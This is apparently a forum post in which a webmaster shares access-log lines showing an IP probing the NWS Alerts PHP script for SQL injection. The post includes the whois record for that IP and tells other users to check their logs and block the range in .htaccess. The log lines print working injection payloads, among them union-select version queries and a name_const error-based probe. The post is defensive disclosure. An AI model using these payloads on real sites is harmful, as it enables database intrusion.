Curly, Ken, et al.,
Came across the following in my logs for yesterday:
Line 1857: 23.91.70.52 - - [14/Jan/2017:14:29:12 -0500] "GET /wxnws-details.php?a=ARZ042'\" HTTP/1.1" 200 24877 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; yplus 5.6.02b)" 0 0 "off:-:-" 164 1307212
Line 1858: 23.91.70.52 - - [14/Jan/2017:14:29:14 -0500] "GET /wxnws-details.php?a=ARZ042 HTTP/1.1" 200 24870 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 215 343855
Line 1859: 23.91.70.52 - - [14/Jan/2017:14:29:14 -0500] "GET /wxnws-details.php?a=ARZ0422121121121212.1 HTTP/1.1" 200 24915 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; generic_01_01; InfoPath.1)" 0 0 "off:-:-" 182 347281
Line 1860: 23.91.70.52 - - [14/Jan/2017:14:29:15 -0500] "GET /wxnws-details.php?a=ARZ042%20and%201%3D1 HTTP/1.1" 200 24695 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)" 0 0 "off:-:-" 206 359951
Line 1861: 23.91.70.52 - - [14/Jan/2017:14:29:15 -0500] "GET /wxnws-details.php?a=ARZ042%20and%201%3E1 HTTP/1.1" 200 24671 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 229 368230
Line 1862: 23.91.70.52 - - [14/Jan/2017:14:29:16 -0500] "GET /wxnws-details.php?a=ARZ042%27%20and%20%27x%27%3D%27x HTTP/1.1" 200 24862 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)" 0 0 "off:-:-" 218 371431
Line 1863: 23.91.70.52 - - [14/Jan/2017:14:29:16 -0500] "GET /wxnws-details.php?a=ARZ042%27%20and%20%27x%27%3D%27y HTTP/1.1" 200 24687 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 0 0 "off:-:-" 247 346981
Line 1864: 23.91.70.52 - - [14/Jan/2017:14:29:17 -0500] "GET /wxnws-details.php?a=ARZ042\"%20and%20\"x\"%3D\"x HTTP/1.1" 200 24868 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; IEMB3; IEMB3; yplus 5.1.04b)" 0 0 "off:-:-" 249 330620
Line 1865: 23.91.70.52 - - [14/Jan/2017:14:29:17 -0500] "GET /wxnws-details.php?a=ARZ042%22%20and%20%22x%22%3D%22y HTTP/1.1" 200 24671 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 241 344537
Line 1866: 23.91.70.52 - - [14/Jan/2017:14:29:18 -0500] "GET /wxnws-details.php?a=ARZ042%20AND%201=1 HTTP/1.1" 200 24917 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial" 0 0 "off:-:-" 157 362337
Line 1873: 23.91.70.52 - - [14/Jan/2017:14:29:19 -0500] "GET /wxnws-details.php?a=ARZ042999999.1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 HTTP/1.1" 200 24911 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 283 373269
Line 1874: 23.91.70.52 - - [14/Jan/2017:14:29:20 -0500] "GET /wxnws-details.php?a=ARZ04299999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x HTTP/1.1" 200 24880 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; SV1; snprtz|S04087544802137; .NET CLR 1.1.4322)" 0 0 "off:-:-" 274 351602
Line 1875: 23.91.70.52 - - [14/Jan/2017:14:29:20 -0500] "GET /wxnws-details.php?a=ARZ04299999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x HTTP/1.1" 200 25028 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; IEMB3; IEMB3; yplus 5.1.04b)" 0 0 "off:-:-" 300 348564
Line 1876: 23.91.70.52 - - [14/Jan/2017:14:29:21 -0500] "GET /wxnws-details.php?a=ARZ042%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1 HTTP/1.1" 200 24688 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; eMusic DLM/3; MSN Optimized;US; MSN Optimized;US)" 0 0 "off:-:-" 359 357790
Line 1877: 23.91.70.52 - - [14/Jan/2017:14:29:21 -0500] "GET /wxnws-details.php?a=ARZ042%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x HTTP/1.1" 200 24850 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 0 0 "off:-:-" 394 343385
Line 1878: 23.91.70.52 - - [14/Jan/2017:14:29:22 -0500] "GET /wxnws-details.php?a=ARZ042%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x HTTP/1.1" 200 24871 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)" 0 0 "off:-:-" 365 333894
Line 1879: 23.91.70.52 - - [14/Jan/2017:14:29:22 -0500] "GET /wxnws-details.php?a=ARZ042' HTTP/1.1" 200 24698 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; generic_01_01; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.3.04b)" 0 0 "off:-:-" 201 345922
Whois IP Information:
NetRange: 23.91.64.0 - 23.91.79.255
CIDR: 23.91.64.0/20
NetName: ASO-239164-20
NetHandle: NET-23-91-64-0-1
Parent: NET23 (NET-23-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS36444, AS36024, AS30496
Organization: A Small Orange LLC (SOL-21)
RegDate: 2013-08-29
Updated: 2014-06-13
Comment:
http://www.asmallorange.comComment: 877-283-2612
Comment: email@asmallorange.com
Ref:
https://whois.arin.net/rest/net/NET-23-91-64-0-1OrgName: A Small Orange LLC
OrgId: SOL-21
Address: 2500 Ridgepoint Drive
City: Austin
StateProv: TX
PostalCode: 78754
Country: US
RegDate: 2012-06-11
Updated: 2014-10-28
Ref:
https://whois.arin.net/rest/org/SOL-21For those who use this script, if you are able to check your sever logs, please do. Plus, if you are able, add them to your .htaccess file.
This is the first time I've seen a deliberate attempt on the NWS Alerts script. Things like this are the reason I check the server logs daily. Needless to say the CIDR was added to my .htaccess file.
John